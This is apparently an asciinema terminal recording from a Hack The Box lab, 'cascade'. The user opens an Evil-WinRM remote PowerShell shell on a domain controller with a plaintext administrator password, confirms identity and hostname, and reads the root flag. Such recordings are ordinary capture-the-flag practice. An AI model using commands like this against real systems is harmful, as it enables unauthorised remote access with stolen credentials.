{"version": 2, "width": 150, "height": 34, "timestamp": 1585748824, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.146944, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[0.147891, "o", "\u001b]2;root@parrot: /home/prashant/Desktop/hackthebox/machines/cascade\u0007\u001b]1;..hines/cascade\u0007"]
[0.260745, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mcascade\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[0.260844, "o", "\u001b[?1h\u001b="]
[0.260994, "o", "\u001b[?2004h"]
[0.755034, "o", "asciinema rec"]
[0.959903, "o", "\u001b[13Devil-winrm -i cascade.htb -u administrator -p baCT3r1aN00dles"]
[1.776647, "o", "\u001b[?1l\u001b>"]
[1.777413, "o", "\u001b[?2004l\r\r\n"]
[1.777832, "o", "\u001b]2;evil-winrm -i cascade.htb -u administrator -p baCT3r1aN00dles\u0007\u001b]1;evil-winrm\u0007"]
[2.799292, "o", "\r\n"]
[2.799613, "o", "\u001b[0;34mEvil-WinRM shell v2.0\u001b[0m\r\n\r\n"]
[2.799795, "o", "\u001b[0;34mInfo: Establishing connection to remote endpoint\u001b[0m\r\n\r\n"]
[8.652483, "o", "\u001b[0;31;49m*Evil-WinRM*\u001b[0m\u001b[0;33;49m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[9.236696, "o", "w"]
[9.418346, "o", "h"]
[9.706992, "o", "o"]
[9.984864, "o", "a"]
[10.136977, "o", "m"]
[10.372906, "o", "i"]
[10.653111, "o", "\r\n"]
[11.282972, "o", "cascade\\administrator\r\r\n"]
[12.488942, "o", "\u001b[0;31;49m*Evil-WinRM*\u001b[0m\u001b[0;33;49m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[12.950093, "o", "h"]
[13.403226, "o", "o"]
[13.720942, "o", "s"]
[13.941147, "o", "t"]
[14.26351, "o", "n"]
[14.403893, "o", "a"]
[14.542924, "o", "m"]
[14.723247, "o", "e"]
[14.911769, "o", "\r\n"]
[16.25591, "o", "CASC-DC1\r\r\n"]
[17.930141, "o", "\u001b[0;31;49m*Evil-WinRM*\u001b[0m\u001b[0;33;49m PS \u001b[0mC:\\Users\\Administrator\\Documents> "]
[18.857575, "o", "c"]
[19.04772, "o", "d"]
[19.233675, "o", " "]
[19.543219, "o", "."]
[19.682881, "o", "."]
[19.848813, "o", "/"]
[20.107514, "o", "d"]
[20.490465, "o", "s"]
[21.100914, "o", "\b\u001b[K"]
[21.37894, "o", "e"]
[21.67549, "o", "s"]
[21.98514, "o", "k"]
[22.299001, "o", "t"]
[22.516893, "o", "o"]
[22.706027, "o", "p"]
[22.944515, "o", "\r\n"]
[25.608045, "o", "\u001b[0;31;49m*Evil-WinRM*\u001b[0m\u001b[0;33;49m PS \u001b[0mC:\\Users\\Administrator\\desktop> "]
[26.165323, "o", "c"]
[26.298176, "o", "a"]
[26.521162, "o", "t"]
[26.715514, "o", " "]
[26.957085, "o", "r"]
[27.161111, "o", "o"]
[27.300868, "o", "o"]
[27.447381, "o", "t"]
[27.662776, "o", "."]
[28.063684, "o", "t"]
[28.224608, "o", "x"]
[28.315061, "o", "t"]
[28.617074, "o", "\r\n"]
[30.066675, "o", "b947f3cda90cc107a9e4b1c69454ca29\r\r\n"]
[31.703749, "o", "\u001b[0;31;49m*Evil-WinRM*\u001b[0m\u001b[0;33;49m PS \u001b[0mC:\\Users\\Administrator\\desktop> "]
[32.769241, "o", "\r\n[1]  + 32278 suspended  evil-winrm -i cascade.htb -u administrator -p baCT3r1aN00dles\r\n"]
[32.769537, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[32.769857, "o", "\u001b]2;root@parrot: /home/prashant/Desktop/hackthebox/machines/cascade\u0007\u001b]1;..hines/cascade\u0007"]
[32.88484, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mcascade\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[32.885087, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[33.573115, "o", "\u001b[?2004l\r\r\n"]
[33.573714, "o", "zsh: you have suspended jobs.\r\n\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r\u001b]2;root@parrot: /home/prashant/Desktop/hackthebox/machines/cascade\u0007\u001b]1;..hines/cascade\u0007"]
[33.686902, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mcascade\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[33.687173, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[35.376384, "o", "e"]
[35.754564, "o", "\bex"]
[35.969127, "o", "i"]
[36.21979, "o", "t"]
[36.427895, "o", "\u001b[?1l\u001b>"]
[36.428568, "o", "\u001b[?2004l\r\r\n\u001b]2;exit\u0007\u001b]1;exit\u0007"]
